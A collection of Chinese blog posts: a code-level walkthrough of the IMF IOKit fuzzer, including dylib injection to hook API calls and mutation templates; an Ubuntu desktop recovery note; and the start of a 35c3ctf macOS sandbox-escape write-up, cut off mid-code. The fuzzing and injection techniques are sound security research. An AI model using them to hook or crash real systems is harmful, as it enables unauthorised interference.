这里的例子中，从 L=1000 个日志里，筛选出了 N=2 个最长公共前缀的日志。

需要注意的是，由于 GUI 事件的非确定性，对于同一个 GUI 程序的相同输入，hook 可能不会生成相同的 API 调用序列。
但如果使用的目标程序是非 GUI 程序，则生成的 API log 大体相同。

4. 依赖推断

a. 顺序依赖

首先， IMF 假设，应该保留 log 中的 API 调用顺序。但这样可能在模型中包含不必要的顺序依赖关系，导致调用之间的顺序依赖过于近似。不过在实际 fuzz 时会适当放宽这个假设。

此时能获取到的调用顺序如下，其中 $A前：

$$IOServiceMatching < IOServiceGetMatchingService < IOServiceOpen < IOConnectCallMethod$$

b. 数据依赖

接下来，IMF 将会从 N=2 的 log 子集中，

检测并识别出常量类型的参数值。先上张图，其中绿色字体表示常量，常量值将被排除在数据流分析之外：

注意，由于先前已经给定了一个 API 函数原型注释文件，因此对于 handler 类型（即诸如io_service_t 和 io_connect_t 的参数，将不会被识别为常量。

检测数据依赖。若前一个函数调用的返回值，作为了后一个函数调用的参数值，那么可以说这两个函数调用之间存在数据依赖关系，即图中黑色虚线所标识的那样。
该论文实现了多种启发式数据依赖的检测方式，这里只是简单介绍了一种。

c. 模型生成

该图是根据上图所生成的一个 API Model，模型使用 AST 来表示：

在这个模型中，我们可以很明显的看到每个函数调用都遵循了先前所推断出的顺序依赖，以及函数之间的值依赖关系。

对于指针 outStructCnt 与 API 的关系，IMF 也可以根据先前所给定的 API 函数注释文件来获取到两者之间的内部关系，从而产生诸如第九行这样的代码。

之后 IMF 便可以根据模型来进行变异与生成。

四、具体实现

1. Logger

a. 论文细节

Logger 需要处理两个问题：

目标程序的输入从何而来？
记录 log 时需要记录多少数据？

首先对于第一个问题：由于论文中使用的目标程序大多是 GUI 程序，而 GUI 程序的输入大多是鼠标事件和键盘事件，因此可以使用 PyUserInput 来为目标程序模拟输入事件。

对于第二个问题：记录 log 时，需要保存多少级间接指针的数据？若级别太多，则会占用大量的磁盘空间，加大分析难度。因此在该论文的实验中，只保存了一级间接指针的数据。

b. 技术细节

在论文所提供的代码中， const.py 文件里已经事先记录了目标 IOKit API 的函数原型定义。一个简单的示例如下所示：

# const.py
API_DEFS = [
    [
        # kern_return_t IOConnectGetService(io_connect_t connect, io_service_t *service);
        ('kern_return_t', 'IOConnectGetService'), 
        [
            # 第一个参数
            ('io_connect_t', 'connect', {}), 
            # 第二个参数。指针参数的第三个字段，即字典中存在一对键值对 IO，用于说明在该函数中，数据是流向指针所指向的内存，还是从该内存中流出；这将用于进一步的数据流分析。
            ('io_service_t *', 'service', {'IO':'O'}) 
        ]
    ],
    ......
]

之后，hook.py 文件将根据给定的 IOKit API 函数原型，结合 C 语言 hook 代码的模板，生成诸如以下 C 代码的 hook.c 文件：

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#ifndef LOG_PATH
#define LOG_PATH "/tmp/log"
#endif

const char* log_path = LOG_PATH;
// 生成 JSON 格式
void log_CFTypeRef(FILE *f,CFTypeRef target){
  CFTypeID ty = CFGetTypeID(target);
  if (ty == CFStringGetTypeID()){
    fprintf(f,"'%s'",CFStringGetCStringPtr(target,kCFStringEncodingUTF8));
  }else if (ty == CFDictionaryGetTypeID()){
    fprintf(f,"{");
    size_t size = CFDictionaryGetCount(target);
    CFTypeRef *keys = (CFTypeRef *) malloc( size * sizeof(CFTypeRef) );
    CFTypeRef *vals = (CFTypeRef *) malloc( size * sizeof(CFTypeRef) );
    CFDictionaryGetKeysAndValues(target,keys,vals);
    for(size_t i=0;i
      log_CFTypeRef(f,keys[i]);
      fprintf(f,":");
      log_CFTypeRef(f,vals[0]);
      fprintf(f,",");
    
    }
    fprintf(f,"}");
    free(keys);
    free(vals);
  }else if (ty == CFNumberGetTypeID()){
    uint64_t n;
    CFNumberGetValue(target,CFNumberGetType(target),&n);
    fprintf(f,"%d",n);
  }else if (ty == CFBooleanGetTypeID()){
    fprintf(f,"%s",CFBooleanGetValue(target)?"True":"False");
  }else{
    fprintf(f,"log_CFTypeRef ERROR");
    exit(0);
  }
}

// IOCatalogueReset 函数 hook 后的处理操作
kern_return_t fake_IOCatalogueReset(mach_port_t masterPort,uint32_t flag){
  FILE *fp = fopen(log_path,"a");
  flock(fileno(fp),LOCK_EX);
  fprintf(fp,"IN ['IOCatalogueReset',");
  if(1) fprintf(fp,"{'name':'masterPort','value': 0x%x,'size' : 0x%lx,'cnt':0x%x, 'data':[",masterPort, sizeof(mach_port_t),1);
  else fprintf(fp,"{'name':'masterPort','value': 0x%x, 'size' : 0x%lx,'cnt':'undefined', 'data':[",masterPort,sizeof(mach_port_t));
  fprintf(fp,"]},");
  if(1) fprintf(fp,"{'name':'flag','value': 0x%x,'size' : 0x%lx,'cnt':0x%x, 'data':[",flag, sizeof(uint32_t),1);
  else fprintf(fp,"{'name':'flag','value': 0x%x, 'size' : 0x%lx,'cnt':'undefined', 'data':[",flag,sizeof(uint32_t));
  fprintf(fp,"]},");
  fprintf(fp,"]\n");
  kern_return_t ret = IOCatalogueReset(masterPort,flag);
  fprintf(fp,"OUT ['IOCatalogueReset',");
  if(1) fprintf(fp,"{'name':'ret','value': 0x%x,'size' : 0x%lx,'cnt':0x%x, 'data':[",ret, sizeof(kern_return_t),1);
  else fprintf(fp,"{'name':'ret','value': 0x%x, 'size' : 0x%lx,'cnt':'undefined', 'data':[",ret,sizeof(kern_return_t));
  fprintf(fp,"]},");
  fprintf(fp,"]\n");
  fclose(fp);
  return ret;
}
[...]

typedef struct interposer {
    void* replacement;
    void* original;
} interpose_t;
__attribute__((used)) static const interpose_t interposers[]
  __attribute__((section("__DATA, __interpose"))) = {
    { 
        .replacement = (void*) fake_IOCatalogueReset, 
        .original    = (void*) IOCatalogueReset
    },
    [...]
  };

hook.py 将会批量生成 fake_IOXXXX 函数，并填充相应的数据结构至 interposers 数组中。

当 hook.py hook.c 命令执行完毕，生成出 hook.c 文件后，执行以下代码将生成待注入的 dylib：

1	clang -Wall -dynamiclib -framework IOKit -framework CoreFoundation -arch x86_64 hook.c -o hook.dylib

之后执行以下命令：

1	DYLD_INSERT_LIBRARIES=${PWD}/hook.dylib [program path] [program args]

这样，目标程序在使用 IOKit lib 时，对应的 IOKit 函数将会被所注入的动态链接库 hook.dylib 动态 hook，并在 /tmp/log 中记录下日志：

# kern_return_t IORegistryEntryGetLocationInPlane(
# io_registry_entry_t entry,
#   const io_name_t   plane,
# io_name_t           location );

IN 
[
  'IORegistryEntryGetLocationInPlane',
  {
    'name':'entry',   # 参数1 变量名
    'value': 0x2607,  # 参数1 调用时传入的值
    'size' : 0x4,     # 参数1 所占用的内存大小，即 sizeof(type)
        'cnt':0x1,    # 参数1 若是指针，则指针所指向的值的个数
        'ori':'IOServiceGetMatchingService(
          0,IOServiceMatching(
            "IOUserServer(com.apple.driverkit.AppleUserHIDDrivers-0x100000419)"))', 
        'data':[]     # 参数1 若是指针，则指针所指向的数组的所有值
  },
  {
    'name':'plane',
    'value': '"IOService"',
    'size' : 0x80,
    'cnt':0x1, 
    'data':[]
  },
  {
    'name':'location',
    'value': '"x&"',
    'size' : 0x80,
    'cnt':0x1, 
    'data':[]
  },
]

OUT 
[
  'IORegistryEntryGetLocationInPlane',
  {
    'name':'ret',
    'value': 0xe00002f0,
    'size' : 0x4,
    'cnt':0x1, 
    'data':[]
  },
]

需要注意的是，对于每一个 IOKit 函数调用，API Hook 都会生成2个条目：

一个是 IN 条目，用于记录传入的参数信息
另一个是 OUT 条目，用于记录函数调用所返回的信息

2. Inferrer

a. Log Filtering

1) 论文细节

由于每次执行目标程序时，不同的环境下会产生不同的日志，因此 IMF 将会对生成的日志进行进一步的过滤与处理。

这里 Log Filtering 的目的是：从给定的日志集中选取N个具有最长公共前缀的日志，并收集这 N 个日志中的公共前缀，以构造出一组具有完全相同的顺序和相同数量的 API 调用序列 S。

由于调用序列 S 中在不同环境下所记录的 log 不同，一些参数会有着不同的参数值，因此这种不确定性可以用于更好的确定 API 模型。

2) 技术细节

Filtering 的操作位于 filter.py 中。

初始时，filter 会循环读入每个日志文件，并对每个日志文件中的每个 IN/OUT log 进行哈希。

def loader(path):
    ret = []
    with open(path, 'rb') as f:
        data = f.read().split('\n')[:-1]
    idx = 0
    while idx < len(data):
        name = parse_name(data[idx])
        selector = parse_selector(data[idx])
        hval = merge(name, selector)
        ret.append(hval)
        idx += 2
    return path, ret

这里对 log 条目进行哈希时，使用的是函数名 + selector 作为输入源(merge 操作)。其中，selector 只有在函数名为 IOConnectCallXXXXMethod 时才有用到。也就是说，这里的哈希将会对相同的函数名 CallMethod 但不同的 selector 选择子区分开来。

哈希后的结果是一个数组，数组中有多个元组，每个元组里分别有两个成员，分别是单个 log 文件名，与一个存放着该 log 文件中每个条目哈希的数组：

[
    'log1.txt', [
        entry1_hash,
        entry2_hash,
        ....
    ],
    ....
]

上面步骤所输出的内容，称为一个 group。接下来 filter 将会执行 categorize 函数，遍历 groups 中某个 index 所对应的 log entry hash。这样做的目的是为了进行最长公共子序列筛选。

每次筛选后，相同 idx 但不同的 hash 的 log entry 将会被单独拆开并合并至新的 group 中。

def categorize(groups, idx):
    ret = []
    for group in groups:
        tmp = {}
        for fn, hvals in group:
            hval = get(hvals, idx)
            if hval not in tmp:
                tmp[hval] = []
            tmp[hval].append((fn, hvals))
        for hval in tmp:
            if hval != None :
                ret.append(tmp[hval])
    return ret

每次筛选并合并成新的 groups 后，都会尝试执行一次 pick_best 的操作，遍历每个 groups 中的 group，并获取数量大于等于 N 的 group 中的 log entry。

def find_best(groups, n):
    before = None
    idx = 0
    while len(groups) != 0:
        before = groups
        groups = categorize(groups, idx)
        if pick_best(groups, n) == None:
            return pick_best(before, n), idx
        idx += 1
    utils.error('find_best error')

如果可以获取，则说明筛选还没有详尽，因此 idx++，继续筛选；若无法获取，则回退返回上一次筛选的内容，并从中选择 log entry 大于等于 N 的 group，同时指定当前所分析到的 idx 长度。（注意单个 group 中会有多个 log 文件）

这样，根据上面的步骤，filter 便可以筛选并继续保存序列长度为 idx（注意这 idx 个长度的序列为公共子序列） 的多个 log 文件。

def save_best(path, best_group, idx):
    for fn, _ in best_group:
        name = fn.split('/')[-1]
        with open(fn, 'rb') as f:
            data = f.read().split('\n')[:-1]
        with open(os.path.join(path, name), 'wb') as f:
            for x in data[:idx*2]:
                f.write(x+'\n')

b. API Model Inference

1) 论文细节

论文中对于 API 的顺序依赖并没有进行特殊的处理，乐观的认为 API 函数之间的调用关系，应该会遵循筛选后的调用序列 S 中的某个相同序列。

而对于 API 的数据依赖，论文中将数据依赖的检测方式分为两步：

识别出所有的常量
识别出一对函数之间的数据流关系

首先是常量识别。对于调用序列的某个函数调用，其常量参数在其他调用序列（即过滤出的 N 个调用序列）中也一定是相同的。例如下面这个例子，

// 序列1
[...]
/* 第i个调用 */ A(变量1, 12);
[...]

// 序列2
[...]
/* 第i个调用 */ A(变量2, 12);
[...]

可以看到，对于不同序列中的第 i 个调用，其参数2的值相同，始终为 12，因此可以认为函数 A 的参数2 是一个常量值。

即，假设 $S^k_{i, j}$为第$k$个调用序列中的第$j$个函数调用里第$i$个参数，若满足 $S^1_{i, j}=S^2_{i, j}=…=S^N_{i, j}$，则说明 $S_{i,j}$ 是一个常量参数。

需要注意的是，在进行常量识别时，需要忽视掉句柄类型。因为对于这种类型的变量来说，即便值相同，但它们依然不是常量。

接下来是数据流识别。IMF 并没有识别参数与参数之间的数据流传递关系（和 syzkaller 不同），它只是简单的识别函数之间那种 函数1返回值 -> 函数2参数值 的数据流关系：

对于某个指定函数调用点的输入参数值，若该调用点前有任何一个函数的返回值与输入参数值相同，则说明这之中存在数据流依赖关系。
如果有多个函数的返回值与输入参数值相同，则始终选择最近的那个函数。

需要注意的是，为了提高精度，IMF 会取每个调用序列中每个函数的数据流依赖交集。

而 inferrer 的最终输出是一个 C 语言的代码片段，即 AST 格式。其中，inferrrer 会根据顺序依赖来生成一系列的函数调用语句。对于每个函数调用，其函数参数将会根据类型来进行不同的填充：

常量参数：使用调用序列里的常量值
非常量参数
- 若与其他函数存在数据依赖，则声明一个变量，将输入参数与存在数据依赖的函数相连接
- 若不存在数据依赖，则随机选择一个该输入参数在日志中出现的值

2) 技术细节

执行 inferrer 时，初始时，程序会先实例化 ApiFuzz 类，在该类的构造函数中执行 const.load_apis 函数，将先前准备好的 IOKit API 函数原型定义 读入内存，并以 Api 类的结构保存。单个 Api 类的结构如下所示：

/* 
以该例子为例
[('kern_return_t', 'IOMasterPort'), 
[('mach_port_t', 'bootstrapPort', {}), ('mach_port_t *', 'masterPort', {'IO': 'O'})]]
*/ 
IOMasterPort_Api_class = {
    rtype:'kern_return_t',
    rval: Arg_class {
    type: 'kern_return_t',
      name: 'ret',
      opt: {}
    },
    name:'IOMasterPort',
    args : [
        Arg {
            type: 'mach_port_t',
            name: 'bootstrapPort',
            opt: {}
        },
    Arg {
            type: 'mach_port_t *',
            name: 'masterPort',
            opt: {'IO': 'O'}
        }
    ]
}

之后，程序会在 ApiFuzz 类的 make_model 成员函数中，以多进程方式执行 load_apilog 成员，将先前 hook 生成的 API log 读入内存。

注意到 API log 中每两个条目（即一对 IN/OUT 条目）对应的是一个 IOKit 函数调用的参数输入与函数返回，因此在 load_apilog 函数中，程序同样会以一对条目为单位读入 ApiLog 类中。每一个 ApiLog 的结构如下所示：

/*
  io_registry_entry_t IORegistryGetRootEntry (mach_port_t masterPort)
  IN ['IORegistryGetRootEntry',{'name':'masterPort','value': 0x0,'size' : 0x4,'cnt':0x1, 'data':[]},]
  OUT ['IORegistryGetRootEntry',{'name':'ret','value': 0x2903,'size' : 0x4,'cnt':0x1, 'data':[]},]
*/
ApiLog(派生自API) = {
    // 以下四个是 API 类中的字段
    args:   xxxxx,
    name:  'IORegistryGetRootEntry',
    rtype:  xxxxx,
    rval:  xxxxx,
    
    api :   Api(IORegistryGetRootEntry),
    args_dict: {
        'masterPort': Arg(IORegistryGetRootEntry_arg0)
    },
    hval: None,
    il: {
        'masterPort': ArgLog(派生自 Arg) {
      // 以下三个是 Arg 类的字段
            type: 'mach_port_t',
            name: 'masterPort',
            opt: {}，

      arg: Arg(内部内容和上面三个字段一样),
      log: {'name':'masterPort','value': 0x0,'size' : 0x4,'cnt':0x1, 'data':[]}
      is_input : True,
        }
    },
    ol: {},
    rval_log: ArgLog {
        // 以下三个是 Arg 类的字段
        type: 'io_registry_entry_t',
        name: 'ret',
        opt: {}，

        arg: Arg(内部内容和上面三个字段一样),
      log: {'name':'ret','value': 0x2903,'size' : 0x4,'cnt':0x1, 'data':[]}
      is_input : False,
    }
}

之后，程序将所有读入的 API log 均存入 ApiFuzz 类中的 apisets 数组，并使用该数组创建 Model 类进行建模。有意思的是，在建模时，只会使用一个 log 文件。

class Model:
    def __init__(self, apisets):
        self.mapis = []
        for idx in range(len(apisets[0])):
            apilog = apisets[0][idx]
            self.mapis.append(Mapi(apilog, idx))
        self.check_const(apisets)
        self.add_dataflow(apisets)

Model 类在初始化时，会将每个 apilog 都转换成 Mapi 类型的结构。该结构的布局和 Api 类型有点类似：

Mapi = {
    api : Api(arglog.api)
    idx : xx,
    il : {
    'masterPort': Marg(派生自 Arg) {
      arg : arglog.arg,
          value : Mval {
                value : xxx,
              const : xxx,
                dataflow = xxx,
              raw : xxx,
              ori : xxx,
              ty : xxx,
              ptr : xxx,
              name : xxx,
            },
            is_in_flag : 数据流是否是流进
      name : arg的名称
            
            array_flag : 表示该arg是否是一个指向数组的指针
            data : 如果当前arg 是数组，则这里存放数组中的内容
            cnt : 表示当 arg 是数组类型时的长度
        }
    }
    ol : {
        .....
    }
}

转换完成后，立即执行 check const 操作，尝试分辨出是否是常量值。若参数类型是指针类型，则程序会单独对指针所指向数组中的每一个元素进程 check const 操作；若参数是非指针类型，则对该参数的数值进行 check const 检查。

check const 检查操作相当的简单：如果第 i 个函数调用的第 j 个参数，在筛选出的 api log 中互不相同，则说明这是一个变量值。

check const 检查完成后，下一步操作是 add dataflow。

def add_dataflow(self, apisets):
    for apiset in apisets:
        before = {}
        for idx in range(len(apiset)):
            apilog = apiset[idx]
            mapi =self.mapis[idx]
            mapi.add_dataflow(before, apilog)
            update_before(before, apilog, mapi, idx)

初始时，add dataflow 函数声明了一个 before 字段，该字段表示过去函数调用所生成的 value 值。之后将每个 Mapi 中 Marg 的参数值加入至 Mval 类型中的 raw 数组中，最后调用 get_xxx_df 函数来更新 Mval 类中的 dataflow 字段，指定该 Mval 的数据流来源。

这样，通过多次遍历 apilog，程序可以对一些 Mval 设置其数据流的单项关系，为接下来代码生成做准备。

3. Fuzzer

a. Fuzz 配置

fuzz 的配置主要有以下几种：

T : 超时时间
I : 迭代次数
P : 变异概率
F : 固定位数，用于变异
R : 随机数种子。

实际开源的代码模板如下所示，注意到这里并没有关于超时时间的设置，这可能是因为这部分代码没有开源：

void parse_args(int argc, char **argv){
    int opt;
    while ((opt = getopt(argc, argv, "f:s:b:r:l:")) != -1){
        switch(opt){
            case 'f':
                log_file = optarg;
                break;
            case 's':
                seed = parse_uint(optarg);
                set_seed = 1;
                break;
            case 'b':
                bitlen = parse_uint(optarg);
                break;
            case 'r':
                rate = parse_uint(optarg);
                break;
            case 'l':
                max_loop = parse_uint(optarg);
                break;
            default :
                help();
        }

    }
    if(log_file == NULL && set_seed == 0){
        help();
    }
}

b. 变异策略

变异策略较为简略，只有参数值变异：对其进行数据上的变异。

这些变异代码都是预先写死在 python 文件中，作为代码模板的一部分，以下是简单的代码模板示例：

uint16_t mut_short(uint16_t v){
  uint16_t r ;
  if( MAYBE ){
    r= get_rand();
    if(bitlen <16){
      return v ^ (r & ((1 << (16-bitlen))-1) ); 
    }else{
      return v ^ (r & 1) ;
    }
  }
  return v;
}

uint32_t mut_int(uint32_t v){
  uint32_t r =0;
  if( MAYBE ){
    r = (r<<16) | (uint32_t) get_rand();
    r = (r<<16) | (uint32_t) get_rand();
    if(bitlen <32){
      return v ^ (r & ((1 << (32-bitlen))-1) ); 
    }else{
      return v ^ (r & 1) ;
    }

  }
  return v;
}

五、评估

IMF 在 macOS 中找到了相当多的 kernel panic 样例。其中大部分是 DoS，有一些可以尝试进行利用。
对于不同类型的目标程序，其能起到 fuzz 的效果是不同的。这是因为不同类型的目标程序，所调用的 IOKit 函数侧重点也不相同。
通过该图我们可以看到，Game 类型的目标程序所产生的 Api Log，被 IMF 读入并用于 fuzz macos 所触发的 kernel panic 最多，但该程序类型却并不是触发内核覆盖率最广的类型。这也可以看到 IMF 极度依赖于执行目标程序所收集到的Api Log。
IMF 精度会受到 N 的影响。对于不同 N ，fuzz 的精度会产生一些波动：

六、不足之处

IMF 的工作建立在那些参数类型非常明确的 syscall API，更侧重于以黑盒方式对参数进行变异，而不会了解每个参数的有效内存范围。
IMF 的前提是了解每个系统调用规范的定义，但这对于驱动程序来说并不适合。因为对于驱动程序来说，其参数多以 void* 传递，IMF 无法根据该无类型指针建立显式数据流依赖关系。

Ubuntu 恢复图形界面记录

2022-01-17T16:00:00.000Z

一、背景

给 npy 安装环境时，误删了她的 ubuntu python3，导致重启 ubuntu 后无法进入图形界面，花了两个小时的时间才解决。

这里简单记录一下恢复图形界面的操作。

二、图形界面恢复

################# 尝试联网 #################
# 命令行界面默认不联网，因此需要手动连网
sudo dhclient eth0
# 失败的话，查看网卡名称
dmesg | grep eth
# 发现eth0被重命名成了exxx0，重新联网
sudo dhclient exxx0

################# 配置终端中文支持 #################
# 下载zhcon
sudo apt-get install zhcon    
# 设置UTF8编码
sudo zhcon --utf8                          

################# 修补其余的依赖 #################
# 先修补其余的依赖，通常正常情况下这里是不会有什么包需要额外安装的
sudo apt-get update  
sudo dpkg --configure -a 
sudo apt-get install --fix-missing

################# 重新安装图形界面 #################
sudo apt-get install --reinstall ubuntu-desktop 
# 安装完成后将会自动加载图形界面

如果仍然不行，则继续执行以下命令试试：

1
2
3

sudo apt-get install ubuntu-minimal ubuntu-standard ubuntu-desktop
sudo apt install nautilus-extension-gnome-terminal
sudo reboot

三、网络连接恢复

首先，设置 /etc/NetworkManager/NetworkManager.conf 中的 managed 选项为 true，由图形界面的网络管理器 NetworkManager 来接管网络连接。
注意 Network Manager 是 Desktop 版本下的网络管理器；而 /etc/network/interfaces 是 Server 版本下的网络管理器。
二者不可同时使用！
1
2
[ifupdown]
managed=true

之后，备份并清空 /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf 文件，重启 Network Manager 服务。

sudo mv /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf  /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf_orig
sudo touch /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf

sudo service network-manager restart

此时 ifconfig 中将显示有线网卡，nmcli 中也会显示对应的有线网卡已连接至有线连接。可以 ping 114.114.114.114，但是无法解析任何网址。

点击 ubuntu 图形界面右上角的有线网络，手动设置 DNS 为 114.114.114.114，之后在终端重启 Network Manager 服务后即可。
1
sudo service network-manager restart

四、参考链接

35c3ctf pillow Writeup

2022-01-07T16:00:00.000Z

一、简介

pillow，是 35c3ctf 中的一道关于 macOS bootstrap Service 沙箱逃逸题目。本人将通过学习这一题来进一步了解Mac OSX XPC 和 Sandbox 机制。
该题中包含了两个自定义 macOS 系统服务。要求攻击者劫持两个 XPC 服务之间的 IPC 连接，以达到沙箱逃逸的目的。
题目链接： pillow - 35c3ctf github

二、环境搭建

在 MacOS 环境下：

编译（可以提前在 Makefile 中添加 -g -O0 编译标志）

git clone git@github.com:saelo/35c3ctf.git
cd 35c3ctf/pillow/capsd
make
cd ../shelld
make

使用 launchd 启动编译出的两个服务
- 首先，修改 distrib/System/Library/LaunchDaemons/ 中的两个 plist, 将文件中的 Program 条目替换成两个 XPC service 编译出的路径。诸如：
  1
  2
  3
  4
  [...]
  Program
  /Users/kiprey/Desktop/CTF/35c3ctf/pillow/capsd/capsd
  [...]
- 之后，令 launchd 启动这两个服务
  1
  2
  sudo chown root:wheel pillow/distrib/System/Library/LaunchDaemons/*.plist
  sudo launchctl bootstrap system pillow/distrib/System/Library/LaunchDaemons/*.plist
- 如果要关闭服务则可以执行
  1
  sudo launchctl bootout system pillow/distrib/System/Library/LaunchDaemons/*.plist
可以通过 log show --predicate 'processID == 1' --last 1h 来查看 launchd 的输出信息。

配置执行 exploit 程序环境

题目已经说明 exploit 位于沙箱中，因此这里也模拟一下。

首先找到 exploit 所使用的沙箱配置文件，这个文件位于 pillow/exploit/exploit.sb：

(version 1)
(deny default)

(import "system.sb")

; TODO enter correct path here
(allow process-exec (literal (param "EXPLOIT_BIN")))
(allow process-fork)

(allow mach-lookup (global-name "net.saelo.shelld"))
(allow mach-lookup (global-name "net.saelo.capsd"))
(allow mach-lookup (global-name "net.saelo.capsd.xpc"))

这里的沙箱配置只允许 fork、exec exploit 以及 mach lookup 题目所提供的三个服务。

之后使用以下命令执行 exploit

1 2	# 注：传入的 EXPLOIT_BIN 路径必须为绝对路径 sandbox-exec -f ./exploit.sb -D EXPLOIT_BIN=/Users/kiprey/Desktop/CTF/35c3ctf/pillow/exploit/myexploit ./myexploit

这样，一个不符合沙箱限制的操作将会被拒绝：

#include 
#include 
#include 

int main() {
    printf("[+] Try running /bin/ls, this operation must be denied!\n");

    char path[] = "/bin/ls";
    char arg1[] = "/";
    char * const exec_argv [] = { path, arg1, NULL };
    char * const exec_env [] = { NULL };
    execve(path, exec_argv, exec_env);
    
    perror("myexploit-execve");
    exit(EXIT_FAILURE);
}

运行结果：

设置 flag 类型，使普通用户不可读（可选），这一步只是做个简单的测试，没有什么实际意义

1 2	sudo chown root:wheel ./flag sudo chmod 640 ./flag

但需要注意的是，被 launchd 启动的守护进程是可以读取这个高权限 flag 的。

以下是用于验证的代码：

FILE* flag = fopen("/Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag", "r");
char buf[100];
size_t len = fread(buf, 1, sizeof(buf), flag);
os_log(OS_LOG_DEFAULT, "flag read len: %zu, flag: [%{public}s]", len, buf);

日志输出：

三、代码研究

1. capsd

我们首先简单看看 MIG 中的接口。

a. capsd.defs

代码很短：

subsystem capsd 733100;

#include 
#include 
#include 

import "../common/types.h";

type string = c_string[*:1024];

routine grant_capability(server: mach_port_t; ServerAuditToken token: audit_token_t; target: audit_token_t; operation: string; arg: string);
routine has_capability(server: mach_port_t; pid: int; operation: string; arg: string; out result: int);

可以看到这里只定义了两个函数 grant_capability 和 has_capability 函数。这两个函数可以被 Client 远程调用至 Server 上的实现。

b. capsd.c

1) capsd main 函数

初始时，capsd 会先输出一条信息，以说明当前守护进程已经开始执行：

1	os_log(OS_LOG_DEFAULT, "net.saelo.capsd starting");

但这条信息并没有那么方便读取到。我们首先得先从 launchd 的日志中获取到 capsd 的 pid 号：

$ log show --predicate 'processID == 0' --last 1h | grep "capsd"

[...]

2022-01-05 17:00:03.199483+0800 0x7c716    Default     0x0                  1      0    launchd: [net.saelo.capsd:] This service is defined to be constantly running and is inherently inefficient.
2022-01-05 17:00:03.199525+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] internal event: WILL_SPAWN, code = 0
2022-01-05 17:00:03.199537+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] service state: spawn scheduled
2022-01-05 17:00:03.199539+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] service state: spawning
2022-01-05 17:00:03.199626+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd:] launching: speculative
2022-01-05 17:00:03.200004+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] xpcproxy spawned with pid 32099
2022-01-05 17:00:03.200033+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] internal event: SPAWNED, code = 0
2022-01-05 17:00:03.200035+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] service state: xpcproxy
2022-01-05 17:00:03.200138+0800 0x7c716    Default     0x0                  1      0    launchd: [system:] Bootstrap by launchctl[32098] for /Users/kiprey/Desktop/CTF/35c3ctf/pillow/distrib/System/Library/LaunchDaemons/net.saelo.capsd.plist succeeded (0: )
2022-01-05 17:00:03.200197+0800 0x7c716    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] internal event: SOURCE_ATTACH, code = 0
2022-01-05 17:00:03.202699+0800 0x7c8af    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] service state: running
2022-01-05 17:00:03.202725+0800 0x7c8af    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] internal event: INIT, code = 0
2022-01-05 17:00:03.202730+0800 0x7c8af    Default     0x0                  1      0    launchd: [system/net.saelo.capsd [32099]:] Successfully spawned capsd[32099] because speculative

我们可以很容易的获取到 capsd 的 pid 为 32099，因此我们继续执行以下命令来查看该程序的 log：

$ log show --predicate 'processID == 32099' --last 1h

Filtering the log data using "processIdentifier == 32099"
Skipping info and debug messages, pass --info and/or --debug to include.
Timestamp                       Thread     Type        Activity             PID    TTL  
2022-01-05 17:00:03.205538+0800 0x7c8bc    Default     0x0                  32099  0    capsd: net.saelo.capsd starting
--------------------------------------------------------------------------------------------------------------------
Log      - Default:          1, Info:                0, Debug:             0, Error:          0, Fault:          0
Activity - Create:           0, Transition:          0, Actions:           0

可以看到成功读取到 capsd 的输出。

接下来，capsd 会使用默认参数，生成一个 空的 CFDictionary 字典：
1
capabilities_by_pid = CFDictionaryCreateMutable(kCFAllocatorDefault, 0, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
需要注意的是，这个字典是全局变量，因此它会在其他上下文中被使用。

之后，capsd 获取 bootstrap port，并把反向 DNS 样式的名称 “net.saelo.capsd” 注册进 bootstrap 中，以备其他进程所使用：

mach_port_t bootstrap_port, service_port;
task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bootstrap_port);

kr = bootstrap_check_in(bootstrap_port, "net.saelo.capsd", &service_port);
ASSERT_MACH_SUCCESS(kr, "bootstrap_check_in");

接下来这步稍微复杂了一点，它指定 capsd_server 函数来处理 service_port 中即将到来的 mach message，即将 service_port 中的事件分发到 capsd_server 中进行处理；之后开始异步执行 mach 事件分发操作：

需要注意的是这里使用 MIG 来生成其余的 mach 信息交互代码，隐藏了 Mach 通信的内部细节。

dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, service_port, 0, dispatch_get_main_queue());

dispatch_source_set_event_handler(source, ^{
    dispatch_mig_server(source, MAX_MSG_SIZE, capsd_server);
});

dispatch_resume(source);

capsd 除了建立 mach message server 以外，它还建立了一个 XPC Service：

// Set up XPC service
xpc_connection_t service = xpc_connection_create_mach_service("net.saelo.capsd.xpc", NULL, XPC_CONNECTION_MACH_SERVICE_LISTENER);
xpc_connection_set_target_queue(service, dispatch_get_main_queue());

xpc_connection_set_event_handler(service, ^(xpc_object_t connection) {
    if (xpc_get_type(connection) == XPC_TYPE_CONNECTION) {
        xpc_connection_set_target_queue(connection, dispatch_get_main_queue());
        xpc_connection_set_event_handler(connection, ^(xpc_object_t msg) {
            [XPC_message_event_handler]
        });
        xpc_connection_resume(connection);
    } else {
        char* description = xpc_copy_description(connection);
        os_log(OS_LOG_DEFAULT, "Received unexpected event: %{public}s\n", description);
        free(description);
    }
});
xpc_connection_resume(service);

这个 XPC Service 实际处理 XPC message 的方式如下所示。

根据代码描述可以得知，传入的 XPC Message 应该是一个字典类型 xpc_dictionary，且有 action(uint64_t)、pid(int64_t)、operation (string)以及 argument(string) 四个 key 值。而返回给调用方的是一个只有 success 键值对的字典。

if (xpc_get_type(msg) == XPC_TYPE_DICTIONARY) {
    xpc_object_t reply = xpc_dictionary_create_reply(msg);
